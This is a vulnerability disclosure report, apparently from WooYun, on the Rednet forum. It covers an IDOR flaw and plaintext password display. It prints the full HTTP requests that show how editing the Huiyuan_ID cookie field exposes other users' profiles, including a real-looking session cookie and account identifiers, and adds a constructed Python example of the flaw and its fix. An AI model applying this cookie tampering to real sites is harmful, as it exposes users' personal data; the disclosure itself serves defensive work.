2015-04-23: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly.
2015-06-07: The vendor has chosen to ignore the vulnerability; details disclosed to the public.
The Rednet forum has a horizontal privilege escalation (IDOR) vulnerability: any logged-in user can browse other users' personal profiles at will. In addition, when changing the password the new password is displayed in plaintext on the page, and after successful registration the password is also echoed back in plaintext.
The edit-profile request. The user's identity is taken from the ID parameter inside the client-side cookie:
GET /EditInfor.asp HTTP/1.1
Host: people.rednet.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://people.rednet.cn/EditInfor.asp
Cookie: Hm_lvt_fe4dc1c3f2f427e38ab444c0482ad49d=1429281476,1429369366,1429369682,1429369859; wdcid=338db40657044830; wdlast=1429369888; vjuids=67c7909da.14cc7d09008.0.89455f3a1acd9; vjlast=1429281477.1429368736.13; hiido_tod=17; hiido_ui=0.7879002586247603; hiido_lv=1429368739125; hiido_ti=1429369891704; ASPSESSIONIDSQSTCCDA=IMPOBJHAFAOJNGKJNMADGNNN; Hm_lpvt_fe4dc1c3f2f427e38ab444c0482ad49d=1429369888; wz%5Ftype=; wz%5Fuser%5FLingdaoId=; wz%5Fuser%5FlastLoginDatetime=; wz%5Fuser%5FLoginTimes=; wz%5Fuser%5FTrueName=; wz%5FUser%5Fpass=; wz%5FUser%5FIdName=; wz%5FUser%5FID=; peopleRednet2010=userinfo=tonylee123%40%401847100837f9a043%40%40482ff55ab7bed6efd4c1b238ceb42688&Huiyuan%5FIsLogin=yes&Huiyuan%5FLastLoginDatetime=2015%2F4%2F18+23%3A01%3A52&Huiyuan%5FLoginTimes=10&Huiyuan%5FIdName=tonylee123&Huiyuan%5FID=465825
Connection: keep-alive
Changing the user ID to 1 (Huiyuan_ID=1 in the cookie):
GET /EditInfor.asp HTTP/1.1
Host: people.rednet.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://people.rednet.cn/EditInfor.asp
Cookie: Hm_lvt_fe4dc1c3f2f427e38ab444c0482ad49d=1429281476,1429369366,1429369682,1429369859; wdcid=338db40657044830; wdlast=1429369888; vjuids=67c7909da.14cc7d09008.0.89455f3a1acd9; vjlast=1429281477.1429368736.13; hiido_tod=17; hiido_ui=0.7879002586247603; hiido_lv=1429368739125; hiido_ti=1429369891704; ASPSESSIONIDSQSTCCDA=IMPOBJHAFAOJNGKJNMADGNNN; Hm_lpvt_fe4dc1c3f2f427e38ab444c0482ad49d=1429369888; wz%5Ftype=; wz%5Fuser%5FLingdaoId=; wz%5Fuser%5FlastLoginDatetime=; wz%5Fuser%5FLoginTimes=; wz%5Fuser%5FTrueName=; wz%5FUser%5Fpass=; wz%5FUser%5FIdName=; wz%5FUser%5FID=; peopleRednet2010=userinfo=tonylee123%40%401847100837f9a043%40%40482ff55ab7bed6efd4c1b238ceb42688&Huiyuan%5FIsLogin=yes&Huiyuan%5FLastLoginDatetime=2015%2F4%2F18+23%3A01%3A52&Huiyuan%5FLoginTimes=10&Huiyuan%5FIdName=tonylee123&Huiyuan%5FID=1
Connection: keep-alive
Another user's profile is returned:
Password change screen: the new password is displayed in plaintext.
After successful registration, the password is echoed back in plaintext.
Recommendation: take the user identity from the server-side session rather than from the cookie. Mask the new-password input on the password change page, and do not echo the password in plaintext after registration.
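To show what the recommended fix looks like, here is an added Python example that is not code from this report or from Rednet: a stand-in for EditInfor.asp in its reported form (identity read from the Huiyuan_ID field of the peopleRednet2010 cookie) beside a corrected form that resolves the user from the server-side session and logs any cookie/session mismatch as a tampering signal. The session store, user table, profile contents and cookie strings are constructed for the demo; only the session id and the user ids 465825 and 1 are taken from the requests above.

```python
from urllib.parse import parse_qs, unquote

# Constructed sample data (not Rednet's real backend). The session id and the
# user ids 465825 / 1 are the ones visible in the report's requests; the
# session store, user table and profile contents are made up for the demo.
SESSIONS = {"IMPOBJHAFAOJNGKJNMADGNNN": 465825}   # ASP session id -> user id
USERS = {
    465825: {"name": "tonylee123", "phone": "000-0000 (constructed)"},
    1:      {"name": "other-user", "phone": "111-1111 (constructed)"},
}
ALERTS = []  # log of cookie/session mismatches for the detection check

def parse_cookie(header: str) -> dict:
    """Split a Cookie header into {name: raw value}; names such as wz%5Ftype are decoded."""
    out = {}
    for part in header.split(";"):
        name, sep, value = part.strip().partition("=")
        if sep:
            out[unquote(name)] = value
    return out

def user_id_from_cookie(cookies: dict):
    """Read Huiyuan_ID out of the url-encoded peopleRednet2010 cookie, if present."""
    fields = parse_qs(cookies.get("peopleRednet2010", ""))
    claimed = fields.get("Huiyuan_ID")
    return int(claimed[0]) if claimed else None

def edit_infor_vulnerable(cookie_header: str) -> dict:
    """The reported behaviour: the profile shown is whichever ID the client sent."""
    return USERS[user_id_from_cookie(parse_cookie(cookie_header))]

def edit_infor_fixed(cookie_header: str) -> dict:
    """The recommended fix: identity comes from the server-side session only."""
    cookies = parse_cookie(cookie_header)
    user_id = SESSIONS.get(cookies.get("ASPSESSIONIDSQSTCCDA"))
    if user_id is None:
        raise PermissionError("no valid session")
    # Detection: a client-supplied ID that disagrees with the session is a
    # tampering signal worth logging, even though it no longer affects the result.
    claimed = user_id_from_cookie(cookies)
    if claimed is not None and claimed != user_id:
        ALERTS.append(f"session user {user_id} sent Huiyuan_ID={claimed}")
    return USERS[user_id]

# Constructed cookie headers modelled on the report's two requests.
LEGIT = ("ASPSESSIONIDSQSTCCDA=IMPOBJHAFAOJNGKJNMADGNNN; "
         "peopleRednet2010=userinfo=tonylee123%40%40x&Huiyuan%5FIsLogin=yes"
         "&Huiyuan%5FIdName=tonylee123&Huiyuan%5FID=465825")
TAMPERED = LEGIT.replace("Huiyuan%5FID=465825", "Huiyuan%5FID=1")
```

With TAMPERED, the vulnerable handler returns user 1's profile while the fixed handler still returns the session owner's profile and records one alert.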
Could not reach the vendor, or the vendor actively declined.
Vulnerability Rank: 8 (WooYun rating)